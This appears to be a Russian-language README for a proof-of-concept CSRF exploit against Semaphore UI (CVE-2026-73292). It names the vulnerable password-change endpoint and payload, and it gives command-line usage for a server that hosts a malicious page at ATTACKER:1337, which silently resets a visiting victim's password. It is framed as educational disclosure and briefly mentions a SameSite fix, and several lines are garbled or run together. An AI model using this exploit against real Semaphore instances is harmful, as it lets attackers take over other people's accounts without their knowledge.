
Эксплойт proof-of-concept для CVE-2026-73292: CSRF-атака на конечную точку смены пароля Semaphore UI, обслуживающая вредоносную страницу, которая незаметно сбрасывает пароль аутентифицированного пользователя.
Только для образовательных целей и ответственного раскрытия уязвимости.
Эта уязвимость была зарегистрирована в GHSA-8cj9-r88m-8945 и затрагивает версии semaphoreui ниже 2.18.21.
Конечная точка смены пароля Semaphore UI не реализует никакой CSRF-защиты:
semaphore) без применения SameSiteВредоносная страница может незаметно изменить пароль любого аутентифицированного пользователя, который её посетит.
Затронутая конечная точка: POST /api/users/{id}/password
{"password": "newpassword", "project_id": 1}
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]
| Аргумент | Описание | По умолчанию |
|---|---|---|
-u / --uri | Базовый URL экземпляра Semaphore | обязательный |
-i / --user_id | ID целевого пользователя | обязательный |
-n / --new_password | Устанавливаемый пароль | passwordchanged |
-p / --port | Порт для обслуживания вредоносной страницы | 1337 |
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337
Затем отправьте жертву (аутентифицированную в Semaphore) на http://ATTACKER:1337. Её пароль будет изменён сразу после загрузки страницы.
python poc.py -u http://TARGET:3000 -i 1
http://ATTACKER:1337/api/users/1/password, возвращающий HTTP 204SameSite=Strict для сессионного cookie